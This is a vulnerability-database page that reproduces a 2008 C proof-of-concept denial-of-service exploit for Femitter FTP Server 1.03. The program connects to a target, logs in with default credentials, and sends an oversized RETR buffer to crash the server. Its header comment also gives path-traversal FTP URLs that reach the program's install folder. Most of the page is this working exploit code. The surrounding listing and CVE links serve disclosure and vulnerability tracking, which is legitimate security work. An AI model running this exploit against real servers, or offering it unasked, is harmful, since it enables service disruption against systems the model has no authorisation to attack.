Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC

🗓️ 17 Sep 2008 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 42 Views

Femitter FTP Server 1.03 Remote DoS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2008-2032
17 Sep 200800:00
circl
CVE		CVE-2008-2032
30 Apr 200815:00
cve
Cvelist		CVE-2008-2032
30 Apr 200815:00
cvelist
EUVD		EUVD-2008-2029
7 Oct 202500:30
euvd
NVD		CVE-2008-2032
30 Apr 200816:17
nvd
Prion		Design/Logic Flaw
30 Apr 200816:17
prion
<html><body><p>/*0-----------------------------------------------------------------------------------0*\
0											0
|											|
|	Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC		|
|											|
|	Summary: Femitter Server is an easy-to use HTTP and FTP server application	|
|	for Windows which allows you to use your own computer for sharing gigabytes	|
|	of files with your friends and colleagues.					|
|											|
|	Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability	|
|	and memory corruption that causes the application to crash. When we send to	|
|	the RETR command an argument like AAAA:AAAA or an overly long string of As	|
|	(1024), the server crashes instantly. Also, when typing into browser:		|
|	ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD),	|
|	and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at	|
|	address 004A218A in module "fem.exe". Write of address 00000000.		|
|											|
|	Product web page: http://acritum.com/fem/index.htm				|
|											|
|	Tested on Microsoft Windows XP SP2 (English)					|
|											|
|	Vulnerability discovered by Gjoko 'LiquidWorm' Krstic				|
|											|
|	liquidworm [t00t] gmail.com							|
|											|
|	http://www.zeroscience.org/							|
|											|
|	17.09.2008									|
|											|
0											0
\*0-----------------------------------------------------------------------------------0*/


#include <sys>
#include <sys>
#include <netinet>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>


#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA"


void header(void);


int main (int argc, char *argv[])
{

	
	int sckt = 0, sfd = 0;
	char user[] = "USER admin\r\n";
	char pass[] = "PASS nimda\r\n";

	unsigned char payload[]=

	"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\xD\xA";

	header();
	
	if(argc != 3)
	{
		printf("\nUsage: %s [ip] [port]\n\n", argv[0]);
		return (EXIT_SUCCESS);
	}
	
	struct sockaddr_in dos_ftp;
	sfd = socket(AF_INET, SOCK_STREAM, 0);
	if(sfd &lt; 0)
	{
		perror("Socket");
		printf("Error creating socket...\n");
		return(1);
	} 
	
	printf("\n\n[+] Socket created!\n");
	sleep (1);

	memset(&amp;dos_ftp, 0x0, sizeof(dos_ftp));
	dos_ftp.sin_family = AF_INET;
	dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
	dos_ftp.sin_port = htons(atoi(argv[2]));
	sckt = connect(sfd, (struct sockaddr *) &amp;dos_ftp, sizeof(dos_ftp));
	if(sckt &lt; 0)
	{
		perror("Connect");
		printf("Error connecting...\n");
		return(1);
	} 

	printf("[+] Connection established!\n");
	sleep (1);
	
	write(sfd, user, strlen(user)); // username
	printf("[+] Sending CMD: %s\n", user);
	sleep (2);
	
	write(sfd, pass, strlen(pass)); // password
	printf("[+] Sending CMD: %s\n", pass);
	sleep (2);
	
	printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]);
	sleep(2);

	send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0);
	printf("[+] Malicious buffer succesfully sent...\n");
	sleep (1);
	printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]);
	
	close (sfd);

	return(0);
}

void header()
{
	printf("\n********************************************************************************\n\n");
	printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n");
	printf("\t\t\tby LiquidWorm <liquidworm gmail.com="">\n\n");
	printf("********************************************************************************\n\n");
}
</liquidworm></netdb.h></errno.h></unistd.h></string.h></stdlib.h></stdio.h></netinet></sys></sys></p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Sep 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.05739
femitter ftp serverremote dosinformation disclosurewindowshttpftpacritum softwaregjoko krsticvulnerability
42